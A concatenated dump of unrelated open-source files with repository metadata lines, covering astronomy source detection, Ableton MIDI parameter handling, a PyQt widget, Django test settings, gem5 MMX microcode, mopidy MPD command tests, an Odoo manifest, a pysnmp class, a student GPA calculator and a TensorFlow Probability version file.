# Load the principal galaxy region file
region = SkyRegionList.from_file(self.config.principal_region)
shape = region[0].to_pixel(self.frame.wcs)
# Create a detection for the galaxy from the shape in the region file
outer_factor = self.config.detection.background_outer_factor
source.detection_from_shape(self.frame, shape, outer_factor)
else:
# If requested, use the galaxy extents obtained from the catalog to create the source
if self.config.detection.use_d25 and source.has_extent:
outer_factor = self.config.detection.background_outer_factor
expansion_factor = self.config.detection.d25_expansion_factor
source.detection_from_parameters(self.frame, outer_factor, expansion_factor)
else:
# Detect the source
try: source.detect(self.frame, self.config.detection)
except Exception as e:
#import traceback
log.error("Error during detection")
print(type(e))
print(e)
traceback.print_exc()
#if self.config.plot_track_record_if_exception:
# if source.has_track_record: source.track_record.plot()
# else: log.warning("Track record is not enabled")
# If a source was not found for the principal or companion galaxies, force it
outer_factor = self.config.detection.background_outer_factor
if source.principal and not source.has_detection: source.detection_from_parameters(self.frame, outer_factor)
elif source.companion and not source.has_detection and source.has_extent: source.detection_from_parameters(self.frame, outer_factor)
# Inform the user
log.info("Found a detection for {0} out of {1} objects ({2:.2f}%)".format(self.have_detection, len(self.sources), self.have_source/len(self.sources)*100.0))
# -----------------------------------------------------------------
def set_detections(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Setting the detections ...")
# Loop over all sources
for source in self.sources:
# Skip None
if source is None: continue
# If this source should be ignored, skip it
if source.ignore: continue
# If the galaxy is the principal galaxy and a region file is given
if source.principal and self.config.principal_region is not None:
# Load the principal galaxy region file
region = SkyRegionList.from_file(self.config.principal_region)
shape = region[0].to_pixel(self.frame.wcs)
# Create a detection for the galaxy from the shape in the region file
outer_factor = self.config.detection.background_outer_factor
source.detection_from_shape(self.frame, shape, outer_factor)
else:
# If requested, use the galaxy extents obtained from the catalog to create the source
if source.has_extent:
outer_factor = self.config.detection.background_outer_factor
expansion_factor = self.config.detection.d25_expansion_factor
source.detection_from_parameters(self.frame, outer_factor, expansion_factor)
                # The galaxy has no extent, so fall back to the configured default radius
else:
default_radius = self.config.region.default_radius
outer_factor = self.config.detection.background_outer_factor
shape = source.ellipse(self.frame.wcs, default_radius)
source.detection_from_shape(self.frame, shape, outer_factor)
# -----------------------------------------------------------------
def find_contours(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing elliptical contours to encompass the detected galaxies ...")
# Loop over all galaxies
for source in self.sources:
# Skip None
if source is None: continue
# If this galaxy should be ignored, skip it
if source.ignore: continue
            # If the galaxy has a source, construct its elliptical contour
            if source.has_source: source.find_contour(self.frame, self.config.apertures)
# -----------------------------------------------------------------
@property
def principal_shape(self):
"""
This function ...
:return:
"""
return self.principal.shape
# -----------------------------------------------------------------
@property
def principal_ellipse(self):
"""
This function ...
:return:
"""
# Get the center in pixel coordinates
center = self.principal.pixel_position(self.frame.wcs)
# Get the angle
angle = self.principal.pa_for_wcs(self.frame.wcs)
x_radius = 0.5 * self.principal.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = 0.5 * self.principal.minor.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
radius = PixelStretch(x_radius, y_radius)
# Create and return an ellipse
return PixelEllipseRegion(center, radius, angle)
# -----------------------------------------------------------------
@property
def principal_sky_ellipse(self):
"""
This function ...
:return:
"""
# Get the ellipse in image coordinates
ellipse = self.principal_ellipse
# Create a SkyEllipse
sky_ellipse = SkyEllipseRegion.from_pixel(ellipse, self.frame.wcs)
# Return the sky ellipse
return sky_ellipse
# -----------------------------------------------------------------
@property
def principal_mask(self):
"""
This function ...
:return:
"""
if self.principal is None: return Mask.empty_like(self.frame)
#return self.galaxies.get_principal_mask(self.frame)
# Create a new mask with the dimensions of the frame
mask = Mask.empty_like(self.frame)
# Add the principal galaxy's mask to the total mask
mask[self.principal.detection.cutout.y_slice, self.principal.detection.cutout.x_slice] = self.principal.detection.mask
# Return the mask
return mask
# -----------------------------------------------------------------
@property
def companion_mask(self):
"""
This function ...
:return:
"""
#return self.galaxies.get_companion_mask(self.frame)
# Create a new mask with the dimension of the frame
mask = Mask.empty_like(self.frame)
# Loop over all companion galaxies
for source in self.companions:
try:
# Check if the galaxy has a source and add its mask to the total mask
if source.has_detection: mask[source.detection.cutout.y_slice, source.detection.cutout.x_slice] = source.detection.mask
except IndexError: pass
# Return the mask
return mask
# -----------------------------------------------------------------
def create_regions(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating regions ...")
# Initialize the region
self.regions = PixelRegionList()
# Loop over all sources
for source in self.sources:
if source is None: continue
# Get the center in pixel coordinates
center = source.pixel_position(self.frame.wcs)
# Set the angle
angle = source.pa_for_wcs(self.frame.wcs).to("deg") if source.pa is not None else Angle(0.0, "deg")
if source.major is None:
color = "red"
x_radius = self.config.region.default_radius
y_radius = self.config.region.default_radius
elif source.minor is None or source.pa is None:
color = "green"
x_radius = 0.5 * source.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = x_radius
else:
color = "green"
x_radius = 0.5 * source.major.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
y_radius = 0.5 * source.minor.to("arcsec").value / self.frame.average_pixelscale.to("arcsec").value
radius = PixelStretch(x_radius, y_radius)
# Create a coordinate for the center and add it to the region
meta = {"point": "x"}
self.regions.append(PixelPointRegion(center.x, center.y, meta=meta))
text = source.name
if source.principal: text += " (principal)"
# If hand-drawn principal region
if source.principal and self.config.principal_region is not None: shape = source.shape
# Create an ellipse for the galaxy
else: shape = PixelEllipseRegion(center, radius, angle, meta=meta)
# Set meta information
meta = {"text": text, "color": color, "index": source.index}
shape.meta = meta
# Add the shape to the region list
self.regions.append(shape)
# -----------------------------------------------------------------
def create_segments(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating the segmentation map ...")
# Loop over all source
for source in self.sources:
# No source: continue
if source is None: continue
# Skip galaxies without source
if not source.has_detection: continue
# Determine the label for the galaxy
if source.principal: label = 1
elif source.companion: label = 2
else: label = 3
# Add the galaxy mask to the segmentation map
self.segments[source.detection.y_slice, source.detection.x_slice][source.detection.mask] = label
# -----------------------------------------------------------------
def create_table(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Creating the table of extended sources ...")
# Loop over the sources
for source in self.sources:
# No source?
#if source is None: continue
# Add source
self.table.add_source(source)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing ...")
# Write table
self.write_table()
# Write regions
self.write_regions()
# Write the segmentation maps
self.write_segments()
# -----------------------------------------------------------------
def write_table(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Writing the table ...")
# Determine the path
path = self.output_path_file("extended_sources.dat")
# Write
self.table.saveto(path)
# -----------------------------------------------------------------
def write_regions(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_segments(self):
"""
This function ...
:return:
"""
pass
# -----------------------------------------------------------------
def write_cutouts(self):
"""
This function ...
:return:
"""
# Determine the full path to the cutouts directory
#directory_path = self.full_output_path(self.config.writing.cutouts_path)
directory_path = fs.join(self.config.output_path, self.config.writing.cutouts_path)
# Inform the user
log.info("Writing cutout boxes to " + directory_path + " ...")
        # Keep track of the number of galaxies encountered
principals = 0
companions = 0
with_source = 0
# Loop over all sources
for source in self.sources:
if source is None: continue
# Check if this is the principal galaxy source
if source.principal:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_principal_" + str(principals) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of principal galaxies (there should only be one, really...)
principals += 1
# Check if this is a companion galaxy
elif source.companion:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_companion_" + str(companions) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of companion galaxies
companions += 1
# Check if this galaxy has a source
elif source.has_detection:
# Save the cutout as a FITS file
path = fs.join(directory_path, "galaxy_source_" + str(principals) + ".fits")
source.detection.saveto(path, origin=self.name)
# Increment the counter of the number of galaxies with a source
with_source += 1
# -----------------------------------------------------------------
@property
def have_source(self):
"""
This function ...
:return:
"""
count = 0
for source in self.sources:
if source is None: continue
count += 1
return count
# -----------------------------------------------------------------
@property
def have_detection(self):
"""
This function ...
:return:
"""
count = 0
for source in self.sources:
if source is None: continue
if source.ignore: continue
count += source.has_detection
return count
# -----------------------------------------------------------------
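# A minimal usage sketch (hypothetical frame and catalog objects, not part of
# this module), assuming the standard Configurable entry point that calls
# setup() followed by _run():
#
#     finder = ExtendedSourceFinder()
#     finder.run(frame=frame, catalog=catalog)
#
# Afterwards the results are available as finder.regions (PixelRegionList),
# finder.segments (Frame) and finder.table (ExtendedSourceTable).
# -----------------------------------------------------------------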
|
lushfuture/Liveduino
|
refs/heads/master
|
libraries/stc-1.2.9/Selected_Track_Control/ParamSetter.py
|
1
|
import Live
import MIDI
import settings
from Logging import log
# general device parameter setter
def general_device(song, device, param, value, mode, status):
param_range = param.max - param.min
#log("set %s (%s): %s - %s" % (param.name, param.value, param.min, param.max))
if param.is_quantized:
if status == MIDI.CC_STATUS and mode == MIDI.ABSOLUTE:
# absolute CC
param.value = round(param_range*value/127.0 + param.min)
else:
# relative CC or NOTE
if param_range == 1 or status == MIDI.NOTEON_STATUS:
# circle through quantized values
p_value = param.value + value
if p_value > param.max:
# values can be bigger than one => take overlap and add it min
p_value = param.min + (p_value % (param_range + 1))
elif p_value < param.min:
p_value = param.max - ((p_value - 1) % (param_range + 1))
param.value = p_value
else:
# range is bigger than on/off and we have relative CC
# => do NOT circle through quantized values
param.value = max(param.min, min(param.max, param.value + value))
else:
if mode == MIDI.ABSOLUTE:
param.value = param_range*value/127.0 + param.min
else:
#param.value = max(param.min, min(param.max, param.value + (value/100.0)))
if param_range > 4:
param.value = max(param.min, min(param.max, param.value + value))
else:
param.value = max(param.min, min(param.max, param.value + param_range*value/127.0))
def looper(song, device, param, value, mode, status):
if not param.name == "State":
general_device(song, device, param, value, mode, status)
return
# get current state:
# 1 - record; 0 - stop; 2 - play; 3 - overdub;
if not value:
return
# floor value to a stepping value
if param.value == 3:
# if "overdub" is active, step back to "play"
value = -1
else:
value = 1
if param.value == 0:
# enable play for record to work
song.continue_playing()
param.value = param.value + value
#general_device(song, device, param, value, mode, status)
setters = {
"Looper": looper
}
def get(device):
if device.name in setters:
return setters[device.name]
return general_device
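# A minimal dispatch sketch (hypothetical caller, not part of the original
# module): look up the setter registered for a device and apply an incoming
# MIDI value to one of its parameters.
def apply_midi_value(song, device, param, value, mode=MIDI.ABSOLUTE, status=MIDI.CC_STATUS):
	# looper() for devices named "Looper", general_device() otherwise
	setter = get(device)
	setter(song, device, param, value, mode, status)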
|
dparks1134/STAMP
|
refs/heads/master
|
stamp/GUI/plotDlg.py
|
1
|
#=======================================================================
# Author: Donovan Parks
#
# Dock widget containing customizable group legend.
#
# Copyright 2011 Donovan Parks
#
# This file is part of STAMP.
#
# STAMP is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# STAMP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with STAMP. If not, see <http://www.gnu.org/licenses/>.
#=======================================================================
from PyQt4 import QtGui, QtCore
from plotDlgUI import Ui_PlotDlg
class PlotDlg(QtGui.QDockWidget):
def __init__(self, parent=None, info=None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_PlotDlg()
self.ui.setupUi(self)
QtCore.QObject.connect(self, QtCore.SIGNAL("topLevelChanged (bool)"), self.topLevelChanged )
QtCore.QObject.connect(self, QtCore.SIGNAL("dockLocationChanged(Qt::DockWidgetArea)"), self.dockLocationChanged)
self.plot = None
def addPlot(self, plot):
self.ui.scrollArea.setWidget(plot)
self.plot = plot
def topLevelChanged (self, bFloating):
if self.plot == None:
return
if bFloating:
w, h = self.plot.get_width_height()
self.setMaximumSize(w, h)
if h > 800:
h = 800
self.resize(w, h)
def dockLocationChanged(self):
self.setMaximumSize(10000, 10000)
if __name__ == "__main__":
pass
|
lmorchard/badg.us
|
refs/heads/master
|
settings_test.py
|
65
|
# These settings will always be overriding for all test runs
# this bypasses bcrypt to speed up test fixtures
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
|
yb-kim/gemV
|
refs/heads/gemV
|
src/arch/x86/isa/insts/simd64/integer/arithmetic/addition.py
|
91
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PADDB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext=0
};
def macroop PADDB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=0
};
def macroop PADDB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=0
};
def macroop PADDW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext=0
};
def macroop PADDW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=0
};
def macroop PADDW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=0
};
def macroop PADDD_MMX_MMX {
maddi mmx, mmx, mmxm, size=4, ext=0
};
def macroop PADDD_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=4, ext=0
};
def macroop PADDD_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=4, ext=0
};
def macroop PADDQ_MMX_MMX {
maddi mmx, mmx, mmxm, size=8, ext=0
};
def macroop PADDQ_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=8, ext=0
};
def macroop PADDQ_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=8, ext=0
};
def macroop PADDSB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext = "2 |" + Signed
};
def macroop PADDSB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext = "2 |" + Signed
};
def macroop PADDSB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext = "2 |" + Signed
};
def macroop PADDSW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext = "2 |" + Signed
};
def macroop PADDUSB_MMX_MMX {
maddi mmx, mmx, mmxm, size=1, ext=2
};
def macroop PADDUSB_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=2
};
def macroop PADDUSB_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=1, ext=2
};
def macroop PADDUSW_MMX_MMX {
maddi mmx, mmx, mmxm, size=2, ext=2
};
def macroop PADDUSW_MMX_M {
ldfp ufp1, seg, sib, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=2
};
def macroop PADDUSW_MMX_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
maddi mmx, mmx, ufp1, size=2, ext=2
};
'''
|
jmarsik/mopidy
|
refs/heads/develop
|
tests/mpd/test_commands.py
|
17
|
# encoding: utf-8
from __future__ import absolute_import, unicode_literals
import unittest
from mopidy.mpd import exceptions, protocol
class TestConverts(unittest.TestCase):
def test_integer(self):
self.assertEqual(123, protocol.INT('123'))
self.assertEqual(-123, protocol.INT('-123'))
self.assertEqual(123, protocol.INT('+123'))
self.assertRaises(ValueError, protocol.INT, '3.14')
self.assertRaises(ValueError, protocol.INT, '')
self.assertRaises(ValueError, protocol.INT, 'abc')
self.assertRaises(ValueError, protocol.INT, '12 34')
def test_unsigned_integer(self):
self.assertEqual(123, protocol.UINT('123'))
self.assertRaises(ValueError, protocol.UINT, '-123')
self.assertRaises(ValueError, protocol.UINT, '+123')
self.assertRaises(ValueError, protocol.UINT, '3.14')
self.assertRaises(ValueError, protocol.UINT, '')
self.assertRaises(ValueError, protocol.UINT, 'abc')
self.assertRaises(ValueError, protocol.UINT, '12 34')
def test_boolean(self):
self.assertEqual(True, protocol.BOOL('1'))
self.assertEqual(False, protocol.BOOL('0'))
self.assertRaises(ValueError, protocol.BOOL, '3.14')
self.assertRaises(ValueError, protocol.BOOL, '')
self.assertRaises(ValueError, protocol.BOOL, 'true')
self.assertRaises(ValueError, protocol.BOOL, 'false')
self.assertRaises(ValueError, protocol.BOOL, 'abc')
self.assertRaises(ValueError, protocol.BOOL, '12 34')
def test_range(self):
self.assertEqual(slice(1, 2), protocol.RANGE('1'))
self.assertEqual(slice(0, 1), protocol.RANGE('0'))
self.assertEqual(slice(0, None), protocol.RANGE('0:'))
self.assertEqual(slice(1, 3), protocol.RANGE('1:3'))
self.assertRaises(ValueError, protocol.RANGE, '3.14')
self.assertRaises(ValueError, protocol.RANGE, '1:abc')
self.assertRaises(ValueError, protocol.RANGE, 'abc:1')
self.assertRaises(ValueError, protocol.RANGE, '2:1')
self.assertRaises(ValueError, protocol.RANGE, '-1:2')
self.assertRaises(ValueError, protocol.RANGE, '1 : 2')
self.assertRaises(ValueError, protocol.RANGE, '')
self.assertRaises(ValueError, protocol.RANGE, 'true')
self.assertRaises(ValueError, protocol.RANGE, 'false')
self.assertRaises(ValueError, protocol.RANGE, 'abc')
self.assertRaises(ValueError, protocol.RANGE, '12 34')
class TestCommands(unittest.TestCase):
def setUp(self): # noqa: N802
self.commands = protocol.Commands()
def test_add_as_a_decorator(self):
@self.commands.add('test')
def test(context):
pass
def test_register_second_command_to_same_name_fails(self):
def func(context):
pass
self.commands.add('foo')(func)
with self.assertRaises(Exception):
self.commands.add('foo')(func)
def test_function_only_takes_context_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar']))
def test_function_has_required_arg_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context, required: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
def test_function_has_optional_args_succeeds(self):
sentinel = object()
self.commands.add('bar')(lambda context, optional=None: sentinel)
self.assertEqual(sentinel, self.commands.call(['bar']))
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
def test_function_has_required_and_optional_args_succeeds(self):
sentinel = object()
def func(context, required, optional=None):
return sentinel
self.commands.add('bar')(func)
self.assertEqual(sentinel, self.commands.call(['bar', 'arg']))
self.assertEqual(sentinel, self.commands.call(['bar', 'arg', 'arg']))
def test_function_has_varargs_succeeds(self):
sentinel, args = object(), []
self.commands.add('bar')(lambda context, *args: sentinel)
for i in range(10):
self.assertEqual(sentinel, self.commands.call(['bar'] + args))
args.append('test')
def test_function_has_only_varargs_succeeds(self):
sentinel = object()
self.commands.add('baz')(lambda *args: sentinel)
self.assertEqual(sentinel, self.commands.call(['baz']))
def test_function_has_no_arguments_fails(self):
with self.assertRaises(TypeError):
self.commands.add('test')(lambda: True)
def test_function_has_required_and_varargs_fails(self):
with self.assertRaises(TypeError):
def func(context, required, *args):
pass
self.commands.add('test')(func)
def test_function_has_optional_and_varargs_fails(self):
with self.assertRaises(TypeError):
def func(context, optional=None, *args):
pass
self.commands.add('test')(func)
def test_function_has_keywordargs_fails(self):
with self.assertRaises(TypeError):
self.commands.add('test')(lambda context, **kwargs: True)
def test_call_chooses_correct_handler(self):
sentinel1, sentinel2, sentinel3 = object(), object(), object()
self.commands.add('foo')(lambda context: sentinel1)
self.commands.add('bar')(lambda context: sentinel2)
self.commands.add('baz')(lambda context: sentinel3)
self.assertEqual(sentinel1, self.commands.call(['foo']))
self.assertEqual(sentinel2, self.commands.call(['bar']))
self.assertEqual(sentinel3, self.commands.call(['baz']))
def test_call_with_nonexistent_handler(self):
with self.assertRaises(exceptions.MpdUnknownCommand):
self.commands.call(['bar'])
def test_call_passes_context(self):
sentinel = object()
self.commands.add('foo')(lambda context: context)
self.assertEqual(
sentinel, self.commands.call(['foo'], context=sentinel))
def test_call_without_args_fails(self):
with self.assertRaises(exceptions.MpdNoCommand):
self.commands.call([])
def test_call_passes_required_argument(self):
self.commands.add('foo')(lambda context, required: required)
self.assertEqual('test123', self.commands.call(['foo', 'test123']))
def test_call_passes_optional_argument(self):
sentinel = object()
self.commands.add('foo')(lambda context, optional=sentinel: optional)
self.assertEqual(sentinel, self.commands.call(['foo']))
self.assertEqual('test', self.commands.call(['foo', 'test']))
def test_call_passes_required_and_optional_argument(self):
def func(context, required, optional=None):
return (required, optional)
self.commands.add('foo')(func)
self.assertEqual(('arg', None), self.commands.call(['foo', 'arg']))
self.assertEqual(
('arg', 'kwarg'), self.commands.call(['foo', 'arg', 'kwarg']))
def test_call_passes_varargs(self):
self.commands.add('foo')(lambda context, *args: args)
def test_call_incorrect_args(self):
self.commands.add('foo')(lambda context: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['foo', 'bar'])
self.commands.add('bar')(lambda context, required: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['bar', 'bar', 'baz'])
self.commands.add('baz')(lambda context, optional=None: context)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['baz', 'bar', 'baz'])
def test_validator_gets_applied_to_required_arg(self):
sentinel = object()
def func(context, required):
return required
self.commands.add('test', required=lambda v: sentinel)(func)
self.assertEqual(sentinel, self.commands.call(['test', 'foo']))
def test_validator_gets_applied_to_optional_arg(self):
sentinel = object()
def func(context, optional=None):
return optional
self.commands.add('foo', optional=lambda v: sentinel)(func)
self.assertEqual(sentinel, self.commands.call(['foo', '123']))
def test_validator_skips_optional_default(self):
sentinel = object()
def func(context, optional=sentinel):
return optional
self.commands.add('foo', optional=lambda v: None)(func)
self.assertEqual(sentinel, self.commands.call(['foo']))
def test_validator_applied_to_non_existent_arg_fails(self):
self.commands.add('foo')(lambda context, arg: arg)
with self.assertRaises(TypeError):
def func(context, wrong_arg):
return wrong_arg
self.commands.add('bar', arg=lambda v: v)(func)
def test_validator_called_context_fails(self):
return # TODO: how to handle this
with self.assertRaises(TypeError):
def func(context):
pass
self.commands.add('bar', context=lambda v: v)(func)
def test_validator_value_error_is_converted(self):
def validate(value):
raise ValueError
def func(context, arg):
pass
self.commands.add('bar', arg=validate)(func)
with self.assertRaises(exceptions.MpdArgError):
self.commands.call(['bar', 'test'])
def test_auth_required_gets_stored(self):
def func1(context):
pass
def func2(context):
pass
self.commands.add('foo')(func1)
self.commands.add('bar', auth_required=False)(func2)
self.assertTrue(self.commands.handlers['foo'].auth_required)
self.assertFalse(self.commands.handlers['bar'].auth_required)
def test_list_command_gets_stored(self):
def func1(context):
pass
def func2(context):
pass
self.commands.add('foo')(func1)
self.commands.add('bar', list_command=False)(func2)
self.assertTrue(self.commands.handlers['foo'].list_command)
self.assertFalse(self.commands.handlers['bar'].list_command)
|
optima-ict/odoo
|
refs/heads/9.0
|
addons/l10n_vn/__openerp__.py
|
17
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# This module is Copyright (c) 2009-2013 General Solutions (http://gscom.vn) All Rights Reserved.
{
"name" : "Vietnam - Accounting",
"version" : "1.0",
"author" : "General Solutions",
'website': 'http://gscom.vn',
"category" : "Localization/Account Charts",
"description": """
This is the module to manage the accounting chart for Vietnam in OpenERP.
=========================================================================
This module applies to companies based in Vietnamese Accounting Standard (VAS).
**Credits:** General Solutions.
""",
"depends" : ["account","base_vat","base_iban"],
"data" : ["account_chart.xml","account_tax.xml","account_chart_template.yml"],
"demo" : [],
"installable": True,
}
|
kerr-huang/Testerman
|
refs/heads/master
|
core/snmp/pysnmp/proto/secmod/rfc3414/auth/noauth.py
|
2
|
from pysnmp.proto.secmod.rfc3414.auth import base
class NoAuth(base.AbstractAuthenticationService):
serviceID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 1) # usmNoAuthProtocol
|
peterakdemir/python_sandbox
|
refs/heads/master
|
GPA_Calculator.py
|
1
|
#The GPA calculator
print("GPA Calculator\n\n")
#This code makes it easy to calculate an average and GPA for a marking period. It assumes seven courses, plus an optional eighth.
#for all the variables that start with g we are asking for the average grade in that class for that marking period
g1 = float(input("Grade for Course 1:"))
#for all the variables that start with c we are asking for the number of credits for that class for that marking period
c1 = float(input("Amount of Credits the Course Takes:"))
g2 = float(input("\nGrade for Course 2:"))
c2 = float(input("Amount of Credits the Course Takes:"))
g3 = float(input("\nGrade for Course 3:"))
c3 = float(input("Amount of Credits the Course Takes:"))
g4 = float(input("\nGrade for Course 4:"))
c4 = float(input("Amount of Credits the Course Takes:"))
g5 = float(input("\nGrade for Course 5:"))
c5 = float(input("Amount of Credits the Course Takes:"))
g6 = float(input("\nGrade for Course 6:"))
c6 = float(input("Amount of Credits the Course Takes:"))
g7 = float(input("\nGrade for Course 7:"))
c7 = float(input("Amount of Credits the Course Takes:"))
g8 = input("\nGrade for Course 8 (if you don't have a course 8, put a dash):")
c8 = input("Amount of Credits the Course Takes (if you don't have a course 8, put a dash):")
print()
#I am now calculating the user's average grade for the marking period.
#This branch is for a student with only seven courses (e.g. a freshman taking a double-period course)
if g8 == "-":
a1 = g1*c1
a2 = g2*c2
a3 = g3*c3
a4 = g4*c4
a5 = g5*c5
a6 = g6*c6
a7 = g7*c7
average = (a1+a2+a3+a4+a5+a6+a7)/(c1+c2+c3+c4+c5+c6+c7)
#I made another variable dividing the average grade by 25 to put it on the 4.0 GPA scale
gpa = average/25
#This is my final output where all my work comes together.
print("Your AVERAGE grade this semester/marking period so far is a ", format(average, ".2f"), ". \n\nYour GPA for this semester/marking peroid so far is a ", format(gpa, ".2f"), ".", sep="")
#this is if the user takes 8 one-period courses
elif g8 != "-" and c8 != "-":
g8 = float(g8)
c8 = float(c8)
a1 = g1*c1
a2 = g2*c2
a3 = g3*c3
a4 = g4*c4
a5 = g5*c5
a6 = g6*c6
a7 = g7*c7
a8 = g8*c8
average = (a1+a2+a3+a4+a5+a6+a7+a8)/(c1+c2+c3+c4+c5+c6+c7+c8)
#I made another variable dividing the average grade by 25 to put it on the 4.0 GPA scale
gpa = average/25
#This is my final output where all my work comes together.
print("Your AVERAGE grade this semester/marking period so far is a ", format(average, ".2f"), ". \n\nYour GPA for this semester/marking peroid so far is a ", format(gpa, ".2f"), ".", sep="")
|
tensorflow/probability
|
refs/heads/main
|
tensorflow_probability/python/version.py
|
1
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Define TensorFlow Probability version information."""
# We follow Semantic Versioning (https://semver.org/)
_MAJOR_VERSION = '0'
_MINOR_VERSION = '14'
_PATCH_VERSION = '0'
# When building releases, we can update this value on the release branch to
# reflect the current release candidate ('rc0', 'rc1') or, finally, the official
# stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a
# release branch, the current version is by default assumed to be a
# 'development' version, labeled 'dev'.
_VERSION_SUFFIX = 'dev'
# Example, '0.4.0-dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
